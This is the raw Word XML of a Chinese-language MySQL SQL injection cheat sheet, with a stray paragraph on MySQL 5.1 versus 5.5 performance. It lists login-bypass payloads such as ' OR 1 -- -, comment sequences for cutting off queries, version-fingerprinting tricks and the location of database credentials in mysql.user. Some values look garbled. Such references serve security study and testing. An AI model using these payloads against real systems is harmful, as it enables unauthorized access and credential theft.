      <w:proofErr w:type="gram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链之后</w:t>
      </w:r>
      <w:proofErr w:type="gram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继续该语句。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引号转义引号</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:i/>
          <w:i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i/>
          <w:iCs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12" w:name="_Toc9145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lastRenderedPageBreak/>
        <w:t>数值</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12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给定查询 SELECT * FROM Table WHERE id = 1;</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="390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678"/>
      </w:tblGrid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AND 1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真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AND 0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假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AND true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真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AND false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假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1-false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sz w:val="24"/>
              </w:rPr>
              <w:t>返回1（如果易受攻击）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1-true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sz w:val="24"/>
              </w:rPr>
              <w:t>返回0（如果易受攻击）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1*56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sz w:val="24"/>
              </w:rPr>
              <w:t>返回56（如果易受攻击）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532"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kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>1*56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color w:val="222222"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>返回1（如果易受攻击）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="30" w:right="30"/>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SELECT * FROM Users WHERE id = 3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- 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532">
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:right="30"/>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:right="30"/>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier" w:hint="eastAsia"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>注：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:right="30"/>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">true </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>等于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:right="30"/>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">false </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>等于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109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bookmarkStart w:id="13" w:name="_Toc27088_WPSOffice_Level2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>登录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109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给定查询 SELECT * FROM Table WHERE username = '';</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="1663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' OR '1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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' OR 1 -- -</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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" OR "" = "</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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" OR 1 = 1 -- -</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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'='</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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“</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="Courier" w:hint="eastAsia"/>
                <w:color w:val="222222"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>LIKE</w:t>
            </w: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”</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532"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'=0--+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left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例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="-3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222222"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SELECT * FROM Users WHERE username = 'Mike' AND password = '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' OR '' ='</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="21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14" w:name="_Toc10894_WPSOffice_Level1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>三．注释输出查询</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/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15" w:name="_Toc18343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/*</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/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MySQL支持几种注释方式：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1.从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‘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#'字符从行尾。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2.从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‘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-- '序列到行尾。请注意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‘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-- '(双破折号)注释风格要求第2个破折号后面至少跟一个空格符(例如空格、tab、换行符等等)。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3.从/*序列到后面的*/序列。结束序列不一定在同一行中，因此该语法允许注释跨越多行。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bookmarkStart w:id="16" w:name="_Toc28130_WPSOffice_Level1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16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以下内容可用于在注入后注释掉查询的其余部分：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="2083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230"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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hAnsi="Courier" w:cs="Courier"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi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#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散列注释</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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hAnsi="Courier" w:cs="Courier"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi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/*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C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型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注释</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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hAnsi="Courier" w:cs="Courier"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi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-- -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SQL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注释</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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hAnsi="Courier" w:cs="Courier"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi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;%00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空字节</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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Theme="majorHAnsi" w:hAnsi="Courier" w:cs="Courier"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi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`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重音符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SELECT * FROM Users WHERE username = '' OR 1=1 -- -' AND password = '';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SELECT * FROM Users WHERE id = '' UNION SELECT 1, 2, 3`';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532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</w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi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Theme="majorHAnsi" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在用作别名时，只使用倒勾</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>符结束</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>查询</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi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Theme="majorHAnsi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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc32209_WPSOffice_Level1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试版本</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17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18" w:name="_Toc23020_WPSOffice_Level2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（1）</w:t>
      </w:r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变量</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="30" w:right="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="222222"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>VERSION()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="30" w:right="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="222222"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>@@VERSION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="30" w:right="30"/>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="222222"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="222222"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>@@GLOBAL.VERSION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532">
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:right="30"/>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="222222"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:right="30"/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例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:right="30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hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM Users WHERE id = '1' AND </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MID(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>VERSION,1,1) = '5';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输出将包含 -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nt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-log 如果DBMS运行在基于Windows的机器上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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19" w:name="_Toc20387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lastRenderedPageBreak/>
        <w:t>特定代码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109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222222"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc13515_WPSOffice_Level2"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>!VERSION</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Specific Code*/</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20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i/>
          <w:iCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>例子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：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>给定查询</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> SELECT * FROM Users limit 1,{INJECTION POINT};</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="53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3210"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C91532"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gram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/*</w:t>
            </w:r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！</w:t>
            </w:r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594EAEA*/</w:t>
            </w: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；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假</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia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版本等于或大于</w:t>
            </w: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5.00 .94</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532"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gram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/*</w:t>
            </w:r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！</w:t>
            </w:r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500 96EAEA*/</w:t>
            </w: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；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真</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia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版本小于</w:t>
            </w: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5.00 .96</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532"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gram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/*</w:t>
            </w:r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！</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="Courier"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>595EAEA*/</w:t>
            </w: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；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22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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假</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia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版本等于</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>5.00 .95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在无法将SQL添加到查询中的情况下，由于注入的位置，它对于确定版本可能很有用。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有关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特定代码的更多信息，请参见MySQL专用代码.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21" w:name="_Toc5264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/*</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/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扩：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480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Oracle 公司发布了MySQL5.5版本,这也是该公司获得MySQL后,对MySQL的第一次升级。Oracle表示，按照内部的标准，在Linux 上，MySQL 5.5的读写速度比5.1版本提升了360%。在Windows Server机器上，这方面性能的提升超过了1500%。MySQL 5.5版本的吞吐量更高。如果真如Oracle所言,MySQL5.5相对于MySQL5.1在性能方面有全面的提升,我公司也会考虑将数据迁移至 MySQL5.5。为了证实MySQL5.5的性能,本人对MySQL5.1与MySQL5.5的常用功能的性能作了一次对比测试,测试根据MySQL引擎类型分两大部分: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myisam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和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innodb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。每一引擎的测试内容又分为三部分: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1、当连接数不断增加时,MySQL平均每秒处理事务(读写混合模式和只读模式)的能力。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2、当数据库表的行数不断增加时,MySQL平均每秒处理事务(读写混合模式和只读模式)的能力。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3、同样的数据,MySQL5.1和MySQL5.5文件所占的空间大小(此方案只测试引擎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myisam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,因为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innodb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的全部数据都存放在ibdata1中,所以没有办法作比较)。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bookmarkStart w:id="22" w:name="_Toc20827_WPSOffice_Level1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22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</w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc22994_WPSOffice_Level1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>五．数据库凭证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23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tbl>
      <w:tblPr>
        <w:tblW w:w="81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236"/>
      </w:tblGrid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表</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7236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mysql.user</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7236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user, password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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当前用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7236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user(),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current_user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(),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current_user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,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system_user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(),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session_user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()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
